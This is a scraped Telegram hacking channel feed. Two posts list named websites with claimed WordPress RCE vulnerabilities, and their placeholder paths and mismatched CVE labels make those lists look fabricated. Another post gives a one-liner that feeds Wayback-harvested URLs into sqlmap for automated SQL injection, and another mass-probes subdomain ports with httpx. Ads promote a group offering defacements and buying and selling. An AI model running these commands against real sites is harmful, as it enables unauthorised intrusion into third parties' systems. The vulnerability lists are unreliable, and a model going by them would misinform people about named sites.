hacking vidhya
Open in Telegram
No data
Subscribers
-824 hours
-137 days
+3730 days
Posts Archive
π¨π¨ Official XRP NPM PACKAGE IS COMPROMISED
Stay vigilant, stay safe!
https://x.com/web3sec_news/status/1914761656145506713
+] http://italianconsultant.com
β CVE-2017-5487 (User Enumeration)
Path: wp-login.php
β CVE-2020-11023 (RCE)
Path: wp-admin/admin-ajax.php
β CVE-2021-24273 (RCE)
Path: wp-admin/admin-post.php
β CVE-2021-24363 (RCE)
Path: wp-admin/update.php
β CVE-2022-0216 (RCE)
Path: wp-admin/user-new.php
β CVE-2022-0739 (RCE)
Path: wp-admin/options.php
β CVE-2022-21663 (RCE)
Path: wp-admin/edit-comments.php
β CVE-2022-21664 (RCE)
Path: wp-includes/comment.php
β CVE-2022-21665 (RCE)
Path: wp-admin/import.php
β CVE-2023-2745 (RCE)
Path: wp-admin/admin-footer.php
β CVE-2023-2747 (RCE)
Path: wp-includes/version.php
Donβt forget to drop your reactions & stars! βοΈβ¨ β Your support keeps me going! ππ
π @hacking_vidhya
============================================================
URL: http://nationalstudenttheatre.org
Version: 4.7.3
Scan Time: 326.76s
[CRITICAL] RCE Vulnerabilities:
- CVE-2020-11023 (RCE)
Path: wp-admin/admin-ajax.php
- CVE-2020-28032 (RCE)
Path: wp-content/plugins/file-manager/
- CVE-2020-28033 (LFI)
Path: wp-content/plugins/plugin-vuln/
- CVE-2021-24273 (RCE)
Path: wp-admin/admin-post.php
- CVE-2024-31210 (RCE)
Path: wp-includes/rest-api/
- CVE-2021-24274 (RCE)
Path: wp-content/plugins/plugin-x/
- CVE-2021-24363 (RCE)
Path: wp-admin/update.php
- CVE-2021-29447 (XXE β RCE)
Path: wp-content/uploads/
- CVE-2021-39200 (RCE)
Path: wp-json/wp/v2/posts
- CVE-2021-44223 (RCE)
Path: wp-content/plugins/plugin-y/
- CVE-2022-0215 (RCE)
Path: wp-includes/js/
- CVE-2022-0216 (RCE)
Path: wp-admin/user-new.php
- CVE-2022-0739 (RCE)
Path: wp-admin/options.php
- CVE-2022-21661 (SQLi β RCE)
Path: wp-includes/class-wp-tax-query.php
- CVE-2022-21662 (RCE)
Path: wp-content/themes/theme-vuln/
- CVE-2022-21663 (RCE)
Path: wp-admin/edit-comments.php
- CVE-2022-21664 (RCE)
Path: wp-includes/comment.php
- CVE-2022-21665 (RCE)
Path: wp-admin/import.php
- CVE-2022-25334 (RCE)
Path: wp-content/plugins/plugin-z/
- CVE-2022-35944 (RCE)
Path: wp-includes/functions.php
- CVE-2023-2745 (RCE)
Path: wp-admin/admin-footer.php
- CVE-2023-2746 (RCE)
Path: wp-content/db.php
- CVE-2023-2747 (RCE)
Path: wp-includes/version.php
- CVE-2023-5361 (RCE)
Path: wp-content/plugins/plugin-a/
- CVE-2024-1072 (RCE)
Path: wp-includes/Requests/
- CVE-2024-1073 (RCE)
Path: wp-admin/maint/
- CVE-2024-1074 (RCE)
Path: wp-content/plugins/plugin-b/
Donβt forget to drop your reactions & stars! βοΈβ¨ β Your support keeps me going! ππ
π @hacking_vidhya
π¨ INE Official Course Discount! π¨
π checkout.ine.com
π Grab high-quality cybersecurity & IT training at a discounted price!
πΈ 40% OFF (on official price)
πΉ No guarantee, direct purchase
π‘ 35% OFF (on official price)
πΉ With guarantee β buy via @stexe for safe and smooth purchase!
π₯ DM @stexe to claim your discount today!
π₯ Limited-time offer β Don't miss out!
π€ SQLMap from Waybackurls.
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"
Credits: Zlatan H
Donβt forget to drop your reactions & stars! βοΈβ¨ β Your support keeps me going! ππ
π @hacking_vidhya
CHAPTER - 25
Hello everyone this year we are moving one more step forward this time we are merging our hacking discussion into another group which is the new era in it sector In this Group You Find Lot Of Things Like
1.Hacking
2.Live classes
3.Buying&Selling
4.Daily Updated Content
5.FreeLancing Projects
6.A Special V.I.P Channel
7.Hackers Event
8.Talking With Experts Which Are Master in Various Things
9.Defacements On Special Occasions
10.Road Maps
11.Each And Every Type of course
12. GROUP ONLINE SHOP AND TOOL
I HOPE YOU LEARN SO MANY NEW THINGS FROM THIS GROUP AND EVERY DOUBT AND QUERY GONNA BE SOLVED OUT AT EVERY LIVE SESSION WHICH IS ON GROUP AND MAKE YOU BETTER IN CYBERSECURITY FIELDS.
THANKYOU
CYBER GENETICS
https://t.me/+08TaWWdwGTo5ZjQ1
π¦ PlayStation Report
β οΈ Title: sys_fsc2h_ctrl kernel stack free
π Reporter: theflow0 (Andy Nguyen)
π Details:
β π Status: resolved
β β‘ Severity: High
β π― CWE: Use After Free
β π’ CVE: None
β° Timeline:
β π Disclosed: 2025-04-18 06:40:26 UTC
β π Created: 2024-12-15 21:52:01 UTC
SOON NEW XSS EXTENSION - :)
https://www.bugcrowd.com/blog/xsspect-a-browser-extension-to-automate-xss-injection
cat subdomain_all.com.txt | httpx-toolkit -ports 3000,5000,5001,7000,7474,8000,8001,8008,8080,8081,8088,8090,8091,8333,8443,8880,8888,9000,9001,9043,9090,9091,9100,9200,9443,9800,12443,16080,18091,18092,20720,28017,45001,4433,6443,8009,8082,9040,9300,9990,27017,5984,5601,4000,8089,8800,9443,9080,7001,7002,8010 -threads 200 > subdomain_all_alive.txt
